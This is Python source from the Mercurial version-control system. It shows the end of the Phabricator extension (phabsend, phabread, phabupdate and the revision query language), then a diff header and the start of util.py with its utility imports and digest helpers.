            {b'type': b'parents.set', b'value': [parentrevphid]}
        )

    if actions:
        transactions += actions

    # Parse commit message and update related fields.
    desc = ctx.description()
    info = callconduit(
        repo.ui, b'differential.parsecommitmessage', {b'corpus': desc}
    )
    for k, v in info[b'fields'].items():
        if k in [b'title', b'summary', b'testPlan']:
            transactions.append({b'type': k, b'value': v})

    params = {b'transactions': transactions}
    if revid is not None:
        # Update an existing Differential Revision
        params[b'objectIdentifier'] = revid

    revision = callconduit(repo.ui, b'differential.revision.edit', params)
    if not revision:
        raise error.Abort(_(b'cannot create revision for %s') % ctx)

    return revision, diff
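
# An illustrative sketch of what the "transactions" list assembled above can
# contain (the PHIDs are made up):
#
#     [
#         {b'type': b'update', b'value': b'PHID-DIFF-xxxxxxxxxxxxxxxxxxxx'},
#         {b'type': b'parents.set', b'value': [b'PHID-DREV-yyyyyyyyyyyyyyyy']},
#         {b'type': b'reviewers.add', b'value': [b'PHID-USER-zzzzzzzzzzzzzz']},
#         {b'type': b'title', b'value': b'my change'},
#     ]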


def userphids(ui, names):
    """convert user names to PHIDs"""
    names = [name.lower() for name in names]
    query = {b'constraints': {b'usernames': names}}
    result = callconduit(ui, b'user.search', query)
    # The API does not treat unknown usernames as an error, so check whether
    # we missed some names here.
    data = result[b'data']
    resolved = set(entry[b'fields'][b'username'].lower() for entry in data)
    unresolved = set(names) - resolved
    if unresolved:
        raise error.Abort(
            _(b'unknown username: %s') % b' '.join(sorted(unresolved))
        )
    return [entry[b'phid'] for entry in data]
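
# For example (hypothetical usernames), userphids(ui, [b'alice', b'bob'])
# would return their two user PHIDs, and abort with "unknown username" if
# either of them does not exist on the server.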


@vcrcommand(
    b'phabsend',
    [
        (b'r', b'rev', [], _(b'revisions to send'), _(b'REV')),
        (b'', b'amend', True, _(b'update commit messages')),
        (b'', b'reviewer', [], _(b'specify reviewers')),
        (b'', b'blocker', [], _(b'specify blocking reviewers')),
        (
            b'm',
            b'comment',
            b'',
            _(b'add a comment to Revisions with new/updated Diffs'),
        ),
        (b'', b'confirm', None, _(b'ask for confirmation before sending')),
    ],
    _(b'REV [OPTIONS]'),
    helpcategory=command.CATEGORY_IMPORT_EXPORT,
)
def phabsend(ui, repo, *revs, **opts):
    """upload changesets to Phabricator

    If multiple revisions are specified, they will be sent as a stack with a
    linear dependency relationship, using the order specified by the revset.

    The first time changesets are uploaded, local tags will be created to
    maintain the association. After the first time, phabsend will check
    obsstore and tags information so it can figure out whether to update an
    existing Differential Revision, or create a new one.

    If --amend is set, update commit messages so they have the
    ``Differential Revision`` URL, and remove the related tags. This is
    similar to what arcanist does, and is preferable in author-push
    workflows. Otherwise, use local tags to record the ``Differential
    Revision`` association.

    The --confirm option lets you confirm changesets before sending them. You
    can also add the following to your configuration file to make it the
    default behaviour::

        [phabsend]
        confirm = true

    phabsend will check obsstore and the above association to decide whether
    to update an existing Differential Revision, or create a new one.
    """
    opts = pycompat.byteskwargs(opts)
    revs = list(revs) + opts.get(b'rev', [])
    revs = scmutil.revrange(repo, revs)
    revs.sort()  # ascending order to preserve topological parent/child in phab

    if not revs:
        raise error.Abort(_(b'phabsend requires at least one changeset'))
    if opts.get(b'amend'):
        cmdutil.checkunfinished(repo)

    # {newnode: (oldnode, olddiff, olddrev)}
    oldmap = getoldnodedrevmap(repo, [repo[r].node() for r in revs])

    confirm = ui.configbool(b'phabsend', b'confirm')
    confirm |= bool(opts.get(b'confirm'))
    if confirm:
        confirmed = _confirmbeforesend(repo, revs, oldmap)
        if not confirmed:
            raise error.Abort(_(b'phabsend cancelled'))

    actions = []
    reviewers = opts.get(b'reviewer', [])
    blockers = opts.get(b'blocker', [])
    phids = []
    if reviewers:
        phids.extend(userphids(repo.ui, reviewers))
    if blockers:
        phids.extend(
            map(
                lambda phid: b'blocking(%s)' % phid,
                userphids(repo.ui, blockers),
            )
        )
    if phids:
        actions.append({b'type': b'reviewers.add', b'value': phids})

    drevids = []  # [int]
    diffmap = {}  # {newnode: diff}

    # Send patches one by one so we know their Differential Revision PHIDs and
    # can provide dependency relationship
    lastrevphid = None
    for rev in revs:
        ui.debug(b'sending rev %d\n' % rev)
        ctx = repo[rev]

        # Get Differential Revision ID
        oldnode, olddiff, revid = oldmap.get(ctx.node(), (None, None, None))
        if oldnode != ctx.node() or opts.get(b'amend'):
            # Create or update Differential Revision
            revision, diff = createdifferentialrevision(
                ctx,
                revid,
                lastrevphid,
                oldnode,
                olddiff,
                actions,
                opts.get(b'comment'),
            )
            diffmap[ctx.node()] = diff
            newrevid = int(revision[b'object'][b'id'])
            newrevphid = revision[b'object'][b'phid']
            if revid:
                action = b'updated'
            else:
                action = b'created'

            # Create a local tag to note the association, if commit message
            # does not have it already
            m = _differentialrevisiondescre.search(ctx.description())
            if not m or int(m.group('id')) != newrevid:
                tagname = b'D%d' % newrevid
                tags.tag(
                    repo,
                    tagname,
                    ctx.node(),
                    message=None,
                    user=None,
                    date=None,
                    local=True,
                )
        else:
            # Nothing changed. But still set "newrevphid" so the next revision
            # could depend on this one and "newrevid" for the summary line.
            newrevphid = querydrev(repo.ui, b'%d' % revid)[0][b'phid']
            newrevid = revid
            action = b'skipped'

        actiondesc = ui.label(
            {
                b'created': _(b'created'),
                b'skipped': _(b'skipped'),
                b'updated': _(b'updated'),
            }[action],
            b'phabricator.action.%s' % action,
        )
        drevdesc = ui.label(b'D%d' % newrevid, b'phabricator.drev')
        nodedesc = ui.label(bytes(ctx), b'phabricator.node')
        desc = ui.label(ctx.description().split(b'\n')[0], b'phabricator.desc')
        ui.write(
            _(b'%s - %s - %s: %s\n') % (drevdesc, actiondesc, nodedesc, desc)
        )
        drevids.append(newrevid)
        lastrevphid = newrevphid

    # Update commit messages and remove tags
    if opts.get(b'amend'):
        unfi = repo.unfiltered()
        drevs = callconduit(ui, b'differential.query', {b'ids': drevids})
        with repo.wlock(), repo.lock(), repo.transaction(b'phabsend'):
            wnode = unfi[b'.'].node()
            mapping = {}  # {oldnode: [newnode]}
            for i, rev in enumerate(revs):
                old = unfi[rev]
                drevid = drevids[i]
                drev = [d for d in drevs if int(d[b'id']) == drevid][0]
                newdesc = getdescfromdrev(drev)
                # Make sure commit message contains "Differential Revision"
                if old.description() != newdesc:
                    if old.phase() == phases.public:
                        ui.warn(
                            _(b"warning: not updating public commit %s\n")
                            % scmutil.formatchangeid(old)
                        )
                        continue
                    parents = [
                        mapping.get(old.p1().node(), (old.p1(),))[0],
                        mapping.get(old.p2().node(), (old.p2(),))[0],
                    ]
                    new = context.metadataonlyctx(
                        repo,
                        old,
                        parents=parents,
                        text=newdesc,
                        user=old.user(),
                        date=old.date(),
                        extra=old.extra(),
                    )

                    newnode = new.commit()

                    mapping[old.node()] = [newnode]
                    # Update diff property
                    # If it fails just warn and keep going, otherwise the DREV
                    # associations will be lost
                    try:
                        writediffproperties(unfi[newnode], diffmap[old.node()])
                    except util.urlerr.urlerror:
                        ui.warnnoi18n(
                            b'Failed to update metadata for D%d\n' % drevid
                        )
                # Remove local tags since they are no longer necessary
                tagname = b'D%d' % drevid
                if tagname in repo.tags():
                    tags.tag(
                        repo,
                        tagname,
                        nullid,
                        message=None,
                        user=None,
                        date=None,
                        local=True,
                    )
            scmutil.cleanupnodes(repo, mapping, b'phabsend', fixphase=True)
            if wnode in mapping:
                unfi.setparents(mapping[wnode][0])
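
# Typical invocations (illustrative; "alice" is a hypothetical reviewer):
#
#   $ hg phabsend -r .
#   $ hg phabsend -r 301::304 --reviewer alice --confirm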


# Map from "hg:meta" keys to header understood by "hg import". The order is
# consistent with "hg export" output.
_metanamemap = util.sortdict(
    [
        (b'user', b'User'),
        (b'date', b'Date'),
        (b'branch', b'Branch'),
        (b'node', b'Node ID'),
        (b'parent', b'Parent '),
    ]
)
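
# i.e. the b'user' key of "hg:meta" becomes a "# User ..." line in the patch
# header, b'date' becomes "# Date ...", and so on, in the same order as
# "hg export" emits them.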


def _confirmbeforesend(repo, revs, oldmap):
    url, token = readurltoken(repo.ui)
    ui = repo.ui
    for rev in revs:
        ctx = repo[rev]
        desc = ctx.description().splitlines()[0]
        oldnode, olddiff, drevid = oldmap.get(ctx.node(), (None, None, None))
        if drevid:
            drevdesc = ui.label(b'D%d' % drevid, b'phabricator.drev')
        else:
            drevdesc = ui.label(_(b'NEW'), b'phabricator.drev')

        ui.write(
            _(b'%s - %s: %s\n')
            % (
                drevdesc,
                ui.label(bytes(ctx), b'phabricator.node'),
                ui.label(desc, b'phabricator.desc'),
            )
        )

    if ui.promptchoice(
        _(b'Send the above changes to %s (yn)?$$ &Yes $$ &No') % url
    ):
        return False

    return True


_knownstatusnames = {
    b'accepted',
    b'needsreview',
    b'needsrevision',
    b'closed',
    b'abandoned',
    b'changesplanned',
}


def _getstatusname(drev):
    """get normalized status name from a Differential Revision"""
    return drev[b'statusName'].replace(b' ', b'').lower()
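
# e.g. a Differential Revision whose statusName is "Needs Review" normalizes
# to b'needsreview', matching an entry in _knownstatusnames above.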


# Small language to specify differential revisions. Supported symbols: (),
# :X, +, and -.

_elements = {
    # token-type: binding-strength, primary, prefix, infix, suffix
    b'(': (12, None, (b'group', 1, b')'), None, None),
    b':': (8, None, (b'ancestors', 8), None, None),
    b'&': (5, None, None, (b'and_', 5), None),
    b'+': (4, None, None, (b'add', 4), None),
    b'-': (4, None, None, (b'sub', 4), None),
    b')': (0, None, None, None, None),
    b'symbol': (0, b'symbol', None, None, None),
    b'end': (0, None, None, None, None),
}
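
# As a sketch, the spec b':D6+8-(2+D4)' (see the phabread docstring below)
# parses into roughly this tree:
#
#   (b'sub',
#    (b'add', (b'ancestors', (b'symbol', b'D6')), (b'symbol', b'8')),
#    (b'group', (b'add', (b'symbol', b'2'), (b'symbol', b'D4'))))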


def _tokenize(text):
    view = memoryview(text)  # zero-copy slice
    special = b'():+-& '
    pos = 0
    length = len(text)
    while pos < length:
        symbol = b''.join(
            itertools.takewhile(
                lambda ch: ch not in special, pycompat.iterbytestr(view[pos:])
            )
        )
        if symbol:
            yield (b'symbol', symbol, pos)
            pos += len(symbol)
        else:  # special char, ignore space
            if text[pos : pos + 1] != b' ':
                yield (text[pos : pos + 1], None, pos)
            pos += 1
    yield (b'end', None, pos)
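
# For example, _tokenize(b':D6+8') yields, in order:
#
#   (b':', None, 0), (b'symbol', b'D6', 1), (b'+', None, 3),
#   (b'symbol', b'8', 4), (b'end', None, 5)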


def _parse(text):
    tree, pos = parser.parser(_elements).parse(_tokenize(text))
    if pos != len(text):
        raise error.ParseError(b'invalid token', pos)
    return tree


def _parsedrev(symbol):
    """str -> int or None, ex. 'D45' -> 45; '12' -> 12; 'x' -> None"""
    if symbol.startswith(b'D') and symbol[1:].isdigit():
        return int(symbol[1:])
    if symbol.isdigit():
        return int(symbol)


def _prefetchdrevs(tree):
    """return ({single-drev-id}, {ancestor-drev-id}) to prefetch"""
    drevs = set()
    ancestordrevs = set()
    op = tree[0]
    if op == b'symbol':
        r = _parsedrev(tree[1])
        if r:
            drevs.add(r)
    elif op == b'ancestors':
        r, a = _prefetchdrevs(tree[1])
        drevs.update(r)
        ancestordrevs.update(r)
        ancestordrevs.update(a)
    else:
        for t in tree[1:]:
            r, a = _prefetchdrevs(t)
            drevs.update(r)
            ancestordrevs.update(a)
    return drevs, ancestordrevs
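
# e.g. for the tree of b':D6+8' this returns ({6, 8}, {6}): D6 and D8 are
# fetched individually, and ancestors are prefetched only for D6.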


def querydrev(ui, spec):
    """return a list of "Differential Revision" dicts

    spec is a string using a simple query language, see docstring in phabread
    for details.

    A "Differential Revision dict" looks like:

        {
            "activeDiffPHID": "PHID-DIFF-xoqnjkobbm6k4dk6hi72",
            "authorPHID": "PHID-USER-tv3ohwc4v4jeu34otlye",
            "auxiliary": {
                "phabricator:depends-on": [
                    "PHID-DREV-gbapp366kutjebt7agcd"
                ],
                "phabricator:projects": [],
            },
            "branch": "default",
            "ccs": [],
            "commits": [],
            "dateCreated": "1499181406",
            "dateModified": "1499182103",
            "diffs": [
                "3",
                "4",
            ],
            "hashes": [],
            "id": "2",
            "lineCount": "2",
            "phid": "PHID-DREV-672qvysjcczopag46qty",
            "properties": {},
            "repositoryPHID": "PHID-REPO-hub2hx62ieuqeheznasv",
            "reviewers": [],
            "sourcePath": null,
            "status": "0",
            "statusName": "Needs Review",
            "summary": "",
            "testPlan": "",
            "title": "example",
            "uri": "https://phab.example.com/D2",
        }
    """
    # TODO: replace differential.query and differential.querydiffs with
    # differential.diff.search because the former (and their output) are
    # frozen, and planned to be deprecated and removed.

    def fetch(params):
        """params -> single drev or None"""
        key = (params.get(b'ids') or params.get(b'phids') or [None])[0]
        if key in prefetched:
            return prefetched[key]
        drevs = callconduit(ui, b'differential.query', params)
        # Fill prefetched with the result
        for drev in drevs:
            prefetched[drev[b'phid']] = drev
            prefetched[int(drev[b'id'])] = drev
        if key not in prefetched:
            raise error.Abort(
                _(b'cannot get Differential Revision %r') % params
            )
        return prefetched[key]

    def getstack(topdrevids):
        """given a top, get a stack from the bottom, [id] -> [id]"""
        visited = set()
        result = []
        queue = [{b'ids': [i]} for i in topdrevids]
        while queue:
            params = queue.pop()
            drev = fetch(params)
            if drev[b'id'] in visited:
                continue
            visited.add(drev[b'id'])
            result.append(int(drev[b'id']))
            auxiliary = drev.get(b'auxiliary', {})
            depends = auxiliary.get(b'phabricator:depends-on', [])
            for phid in depends:
                queue.append({b'phids': [phid]})
        result.reverse()
        return smartset.baseset(result)

    # Initialize prefetch cache
    prefetched = {}  # {id or phid: drev}

    tree = _parse(spec)
    drevs, ancestordrevs = _prefetchdrevs(tree)

    # developer config: phabricator.batchsize
    batchsize = ui.configint(b'phabricator', b'batchsize')

    # Prefetch Differential Revisions in batch
    tofetch = set(drevs)
    for r in ancestordrevs:
        tofetch.update(range(max(1, r - batchsize), r + 1))
    if drevs:
        fetch({b'ids': list(tofetch)})
    validids = sorted(set(getstack(list(ancestordrevs))) | set(drevs))

    # Walk through the tree, return smartsets
    def walk(tree):
        op = tree[0]
        if op == b'symbol':
            drev = _parsedrev(tree[1])
            if drev:
                return smartset.baseset([drev])
            elif tree[1] in _knownstatusnames:
                drevs = [
                    r
                    for r in validids
                    if _getstatusname(prefetched[r]) == tree[1]
                ]
                return smartset.baseset(drevs)
            else:
                raise error.Abort(_(b'unknown symbol: %s') % tree[1])
        elif op in {b'and_', b'add', b'sub'}:
            assert len(tree) == 3
            return getattr(operator, op)(walk(tree[1]), walk(tree[2]))
        elif op == b'group':
            return walk(tree[1])
        elif op == b'ancestors':
            return getstack(walk(tree[1]))
        else:
            raise error.ProgrammingError(b'illegal tree: %r' % tree)

    return [prefetched[r] for r in walk(tree)]


def getdescfromdrev(drev):
    """get description (commit message) from "Differential Revision"

    This is similar to the differential.getcommitmessage API, but we only
    care about a limited set of fields: title, summary, test plan, and URL.
    """
    title = drev[b'title']
    summary = drev[b'summary'].rstrip()
    testplan = drev[b'testPlan'].rstrip()
    if testplan:
        testplan = b'Test Plan:\n%s' % testplan
    uri = b'Differential Revision: %s' % drev[b'uri']
    return b'\n\n'.join(filter(None, [title, summary, testplan, uri]))
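
# The assembled message therefore has this shape (empty fields are dropped):
#
#   <title>
#
#   <summary>
#
#   Test Plan:
#   <test plan>
#
#   Differential Revision: https://phab.example.com/D2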


def getdiffmeta(diff):
    """get commit metadata (date, node, user, p1) from a diff object

    The metadata could be "hg:meta", sent by phabsend, like:

        "properties": {
            "hg:meta": {
                "branch": "default",
                "date": "1499571514 25200",
                "node": "98c08acae292b2faf60a279b4189beb6cff1414d",
                "user": "Foo Bar <foo@example.com>",
                "parent": "6d0abad76b30e4724a37ab8721d630394070fe16"
            }
        }

    Or converted from "local:commits", sent by "arc", like:

        "properties": {
            "local:commits": {
                "98c08acae292b2faf60a279b4189beb6cff1414d": {
                    "author": "Foo Bar",
                    "authorEmail": "foo@example.com",
                    "branch": "default",
                    "commit": "98c08acae292b2faf60a279b4189beb6cff1414d",
                    "local": "1000",
                    "message": "...",
                    "parents": ["6d0abad76b30e4724a37ab8721d630394070fe16"],
                    "rev": "98c08acae292b2faf60a279b4189beb6cff1414d",
                    "summary": "...",
                    "tag": "",
                    "time": 1499546314,
                }
            }
        }

    Note: metadata extracted from "local:commits" will lose time zone
    information.
    """
    props = diff.get(b'properties') or {}
    meta = props.get(b'hg:meta')
    if not meta:
        if props.get(b'local:commits'):
            commit = sorted(props[b'local:commits'].values())[0]
            meta = {}
            if b'author' in commit and b'authorEmail' in commit:
                meta[b'user'] = b'%s <%s>' % (
                    commit[b'author'],
                    commit[b'authorEmail'],
                )
            if b'time' in commit:
                meta[b'date'] = b'%d 0' % int(commit[b'time'])
            if b'branch' in commit:
                meta[b'branch'] = commit[b'branch']
            node = commit.get(b'commit', commit.get(b'rev'))
            if node:
                meta[b'node'] = node
            if len(commit.get(b'parents', ())) >= 1:
                meta[b'parent'] = commit[b'parents'][0]
        else:
            meta = {}
    if b'date' not in meta and b'dateCreated' in diff:
        meta[b'date'] = b'%s 0' % diff[b'dateCreated']
    if b'branch' not in meta and diff.get(b'branch'):
        meta[b'branch'] = diff[b'branch']
    if b'parent' not in meta and diff.get(b'sourceControlBaseRevision'):
        meta[b'parent'] = diff[b'sourceControlBaseRevision']
    return meta


def readpatch(ui, drevs, write):
    """generate plain-text patch readable by 'hg import'

    write takes a list of (DREV, bytes), where DREV is the differential number
    (as bytes, without the "D" prefix) and the bytes are the text of a patch
    to be imported. drevs is what "querydrev" returns, results of
    "differential.query".
    """
    # Prefetch hg:meta property for all diffs
    diffids = sorted(set(max(int(v) for v in drev[b'diffs']) for drev in drevs))
    diffs = callconduit(ui, b'differential.querydiffs', {b'ids': diffids})

    patches = []

    # Generate patch for each drev
    for drev in drevs:
        ui.note(_(b'reading D%s\n') % drev[b'id'])

        diffid = max(int(v) for v in drev[b'diffs'])
        body = callconduit(ui, b'differential.getrawdiff', {b'diffID': diffid})
        desc = getdescfromdrev(drev)
        header = b'# HG changeset patch\n'

        # Try to preserve metadata from hg:meta property. Write hg patch
        # headers that can be read by the "import" command. See patchheadermap
        # and extract in mercurial/patch.py for supported headers.
        meta = getdiffmeta(diffs[b'%d' % diffid])
        for k in _metanamemap.keys():
            if k in meta:
                header += b'# %s %s\n' % (_metanamemap[k], meta[k])

        content = b'%s%s\n%s' % (header, desc, body)
        patches.append((drev[b'id'], content))

    # Write patches to the supplied callback
    write(patches)
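
# A generated patch starts with headers like the following (values borrowed
# from the getdiffmeta() docstring above), followed by the commit message and
# the raw diff:
#
#   # HG changeset patch
#   # User Foo Bar <foo@example.com>
#   # Date 1499571514 25200
#   # Branch default
#   # Node ID 98c08acae292b2faf60a279b4189beb6cff1414d
#   # Parent  6d0abad76b30e4724a37ab8721d630394070fe16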


@vcrcommand(
    b'phabread',
    [(b'', b'stack', False, _(b'read dependencies'))],
    _(b'DREVSPEC [OPTIONS]'),
    helpcategory=command.CATEGORY_IMPORT_EXPORT,
    optionalrepo=True,
)
def phabread(ui, repo, spec, **opts):
    """print patches from Phabricator suitable for importing

    DREVSPEC could be a Differential Revision identity, like ``D123``, or just
    the number ``123``. It could also have common operators like ``+``, ``-``,
    ``&``, ``(``, ``)`` for complex queries. The prefix ``:`` can be used to
    select a stack.

    ``abandoned``, ``accepted``, ``closed``, ``needsreview``, ``needsrevision``
    can be used to filter patches by status. For performance reasons, they
    only represent a subset of non-status selections and cannot be used alone.

    For example, ``:D6+8-(2+D4)`` selects a stack up to D6, plus D8, and
    excludes D2 and D4. ``:D9 & needsreview`` selects "Needs Review" revisions
    in a stack up to D9.

    If --stack is given, follow dependency information and read all patches.
    It is equivalent to the ``:`` operator.
    """
    opts = pycompat.byteskwargs(opts)
    if opts.get(b'stack'):
        spec = b':(%s)' % spec
    drevs = querydrev(ui, spec)

    def _write(patches):
        for drev, content in patches:
            ui.write(content)

    readpatch(ui, drevs, _write)


@vcrcommand(
    b'phabupdate',
    [
        (b'', b'accept', False, _(b'accept revisions')),
        (b'', b'reject', False, _(b'reject revisions')),
        (b'', b'abandon', False, _(b'abandon revisions')),
        (b'', b'reclaim', False, _(b'reclaim revisions')),
        (b'm', b'comment', b'', _(b'comment on the last revision')),
    ],
    _(b'DREVSPEC [OPTIONS]'),
    helpcategory=command.CATEGORY_IMPORT_EXPORT,
    optionalrepo=True,
)
def phabupdate(ui, repo, spec, **opts):
    """update Differential Revisions in batch

    DREVSPEC selects revisions. See :hg:`help phabread` for its usage.
    """
    opts = pycompat.byteskwargs(opts)
    flags = [n for n in b'accept reject abandon reclaim'.split() if opts.get(n)]
    if len(flags) > 1:
        raise error.Abort(_(b'%s cannot be used together') % b', '.join(flags))

    actions = []
    for f in flags:
        actions.append({b'type': f, b'value': True})

    drevs = querydrev(ui, spec)
    for i, drev in enumerate(drevs):
        if i + 1 == len(drevs) and opts.get(b'comment'):
            actions.append({b'type': b'comment', b'value': opts[b'comment']})
        if actions:
            params = {
                b'objectIdentifier': drev[b'phid'],
                b'transactions': actions,
            }
            callconduit(ui, b'differential.revision.edit', params)
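
# Typical invocations (illustrative):
#
#   $ hg phabupdate --accept D123
#   $ hg phabupdate --abandon :D9 -m 'superseded'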


@eh.templatekeyword(b'phabreview', requires={b'ctx'})
def template_review(context, mapping):
    """:phabreview: Object describing the review for this changeset.
    Has attributes `url` and `id`.
    """
    ctx = context.resource(mapping, b'ctx')
    m = _differentialrevisiondescre.search(ctx.description())
    if m:
        return templateutil.hybriddict(
            {b'url': m.group('url'), b'id': b"D%s" % m.group('id'),}
        )
    else:
        tags = ctx.repo().nodetags(ctx.node())
        for t in tags:
            if _differentialrevisiontagre.match(t):
                url = ctx.repo().ui.config(b'phabricator', b'url')
                if not url.endswith(b'/'):
                    url += b'/'
                url += t

                return templateutil.hybriddict({b'url': url, b'id': t,})
        return None


@eh.templatekeyword(b'phabstatus', requires={b'ctx', b'repo', b'ui'})
def template_status(context, mapping):
    """:phabstatus: String. Status of Phabricator differential.
    """
    ctx = context.resource(mapping, b'ctx')
    repo = context.resource(mapping, b'repo')
    ui = context.resource(mapping, b'ui')

    rev = ctx.rev()
    try:
        drevid = getdrevmap(repo, [rev])[rev]
    except KeyError:
        return None
    drevs = callconduit(ui, b'differential.query', {b'ids': [drevid]})
    for drev in drevs:
        if int(drev[b'id']) == drevid:
            return templateutil.hybriddict(
                {b'url': drev[b'uri'], b'status': drev[b'statusName'],}
            )
    return None
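
# Both template keywords can be used from the command line, e.g.:
#
#   $ hg log -r . -T '{phabreview.url}\n'
#   $ hg log -r . -T '{phabstatus}\n'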


@show.showview(b'phabstatus', csettopic=b'work')
def phabstatusshowview(ui, repo, displayer):
    """Phabricator differential status"""
    revs = repo.revs('sort(_underway(), topo)')
    drevmap = getdrevmap(repo, revs)
    unknownrevs, drevids, revsbydrevid = [], set([]), {}
    for rev, drevid in pycompat.iteritems(drevmap):
        if drevid is not None:
            drevids.add(drevid)
            revsbydrevid.setdefault(drevid, set([])).add(rev)
        else:
            unknownrevs.append(rev)

    drevs = callconduit(ui, b'differential.query', {b'ids': list(drevids)})
    drevsbyrev = {}
    for drev in drevs:
        for rev in revsbydrevid[int(drev[b'id'])]:
            drevsbyrev[rev] = drev

    def phabstatus(ctx):
        drev = drevsbyrev[ctx.rev()]
        status = ui.label(
            b'%(statusName)s' % drev,
            b'phabricator.status.%s' % _getstatusname(drev),
        )
        ui.write(b"\n%s %s\n" % (drev[b'uri'], status))

    revs -= smartset.baseset(unknownrevs)
    revdag = graphmod.dagwalker(repo, revs)

    ui.setconfig(b'experimental', b'graphshorten', True)
    displayer._exthook = phabstatus
    nodelen = show.longestshortest(repo, revs)
    logcmdutil.displaygraph(
        ui,
        repo,
        revdag,
        displayer,
        graphmod.asciiedges,
        props={b'nodelen': nodelen},
    )
@@ -1,3618 +1,3618 b''
# util.py - Mercurial utility functions and platform specific implementations
#
# Copyright 2005 K. Thananchayan <thananck@yahoo.com>
# Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
# Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.

"""Mercurial utility functions and platform specific implementations.

This contains helper routines that are independent of the SCM core and
hide platform-specific details from the core.
"""

from __future__ import absolute_import, print_function

import abc
import collections
import contextlib
import errno
import gc
import hashlib
import itertools
import mmap
import os
import platform as pyplatform
import re as remod
import shutil
import socket
import stat
import sys
import time
import traceback
import warnings

from .thirdparty import attr
from .pycompat import (
    delattr,
    getattr,
    open,
    setattr,
)
from hgdemandimport import tracing
from . import (
    encoding,
    error,
    i18n,
    node as nodemod,
    policy,
    pycompat,
    urllibcompat,
)
from .utils import (
    compression,
    hashutil,
    procutil,
    stringutil,
)

base85 = policy.importmod('base85')
osutil = policy.importmod('osutil')

b85decode = base85.b85decode
b85encode = base85.b85encode

cookielib = pycompat.cookielib
httplib = pycompat.httplib
pickle = pycompat.pickle
safehasattr = pycompat.safehasattr
socketserver = pycompat.socketserver
bytesio = pycompat.bytesio
# TODO deprecate stringio name, as it is a lie on Python 3.
stringio = bytesio
xmlrpclib = pycompat.xmlrpclib

httpserver = urllibcompat.httpserver
urlerr = urllibcompat.urlerr
urlreq = urllibcompat.urlreq

# workaround for win32mbcs
_filenamebytestr = pycompat.bytestr

if pycompat.iswindows:
    from . import windows as platform
else:
    from . import posix as platform

_ = i18n._

bindunixsocket = platform.bindunixsocket
cachestat = platform.cachestat
checkexec = platform.checkexec
checklink = platform.checklink
copymode = platform.copymode
expandglobs = platform.expandglobs
getfsmountpoint = platform.getfsmountpoint
getfstype = platform.getfstype
groupmembers = platform.groupmembers
groupname = platform.groupname
isexec = platform.isexec
isowner = platform.isowner
listdir = osutil.listdir
localpath = platform.localpath
lookupreg = platform.lookupreg
makedir = platform.makedir
nlinks = platform.nlinks
normpath = platform.normpath
normcase = platform.normcase
normcasespec = platform.normcasespec
normcasefallback = platform.normcasefallback
openhardlinks = platform.openhardlinks
oslink = platform.oslink
parsepatchoutput = platform.parsepatchoutput
pconvert = platform.pconvert
poll = platform.poll
posixfile = platform.posixfile
readlink = platform.readlink
rename = platform.rename
removedirs = platform.removedirs
samedevice = platform.samedevice
samefile = platform.samefile
samestat = platform.samestat
setflags = platform.setflags
split = platform.split
statfiles = getattr(osutil, 'statfiles', platform.statfiles)
statisexec = platform.statisexec
statislink = platform.statislink
umask = platform.umask
unlink = platform.unlink
username = platform.username

# small compat layer
compengines = compression.compengines
SERVERROLE = compression.SERVERROLE
CLIENTROLE = compression.CLIENTROLE

try:
    recvfds = osutil.recvfds
except AttributeError:
    pass

# Python compatibility

_notset = object()


def bitsfrom(container):
    bits = 0
    for bit in container:
        bits |= bit
    return bits


# Python 2.6 still has deprecation warnings enabled by default. We do not want
# to display anything to standard users, so detect whether we are running the
# test suite and only use Python deprecation warnings in that case.
_dowarn = bool(encoding.environ.get(b'HGEMITWARNINGS'))
if _dowarn:
    # explicitly unfilter our warning for python 2.7
    #
    # The option of setting PYTHONWARNINGS in the test runner was investigated.
    # However, module name set through PYTHONWARNINGS was exactly matched, so
    # we cannot set 'mercurial' and have it match eg: 'mercurial.scmutil'. This
    # makes the whole PYTHONWARNINGS thing useless for our use case.
    warnings.filterwarnings('default', '', DeprecationWarning, 'mercurial')
    warnings.filterwarnings('default', '', DeprecationWarning, 'hgext')
    warnings.filterwarnings('default', '', DeprecationWarning, 'hgext3rd')
if _dowarn and pycompat.ispy3:
    # silence warning emitted by passing user string to re.sub()
    warnings.filterwarnings(
        'ignore', 'bad escape', DeprecationWarning, 'mercurial'
    )
    warnings.filterwarnings(
        'ignore', 'invalid escape sequence', DeprecationWarning, 'mercurial'
    )
    # TODO: reinvent imp.is_frozen()
    warnings.filterwarnings(
        'ignore',
        'the imp module is deprecated',
        DeprecationWarning,
        'mercurial',
    )


def nouideprecwarn(msg, version, stacklevel=1):
    """Issue a Python-native deprecation warning.

    This is a no-op outside of tests; use 'ui.deprecwarn' when possible.
    """
    if _dowarn:
        msg += (
            b"\n(compatibility will be dropped after Mercurial-%s,"
            b" update your code.)"
        ) % version
        warnings.warn(pycompat.sysstr(msg), DeprecationWarning, stacklevel + 1)
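

# Editor's sketch (hypothetical message and version): the call below is a
# no-op unless HGEMITWARNINGS was set in the environment when this module
# was imported, since that is what populates the _dowarn flag above.
def _example_nouideprecwarn():
    nouideprecwarn(b'frobnicate() is deprecated', b'5.4', stacklevel=2)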


DIGESTS = {
    b'md5': hashlib.md5,
    b'sha1': hashutil.sha1,
    b'sha512': hashlib.sha512,
}
# List of digest types from strongest to weakest
DIGESTS_BY_STRENGTH = [b'sha512', b'sha1', b'md5']

for k in DIGESTS_BY_STRENGTH:
    assert k in DIGESTS


class digester(object):
    """helper to compute digests.

    This helper can be used to compute one or more digests given their name.

    >>> d = digester([b'md5', b'sha1'])
    >>> d.update(b'foo')
    >>> [k for k in sorted(d)]
    ['md5', 'sha1']
    >>> d[b'md5']
    'acbd18db4cc2f85cedef654fccc4a4d8'
    >>> d[b'sha1']
    '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'
    >>> digester.preferred([b'md5', b'sha1'])
    'sha1'
    """

    def __init__(self, digests, s=b''):
        self._hashes = {}
        for k in digests:
            if k not in DIGESTS:
                raise error.Abort(_(b'unknown digest type: %s') % k)
            self._hashes[k] = DIGESTS[k]()
        if s:
            self.update(s)

    def update(self, data):
        for h in self._hashes.values():
            h.update(data)

    def __getitem__(self, key):
        if key not in DIGESTS:
            raise error.Abort(_(b'unknown digest type: %s') % key)
        return nodemod.hex(self._hashes[key].digest())

    def __iter__(self):
        return iter(self._hashes)

    @staticmethod
    def preferred(supported):
        """returns the strongest digest type in both supported and DIGESTS."""

        for k in DIGESTS_BY_STRENGTH:
            if k in supported:
                return k
        return None


class digestchecker(object):
    """file handle wrapper that additionally checks content against a given
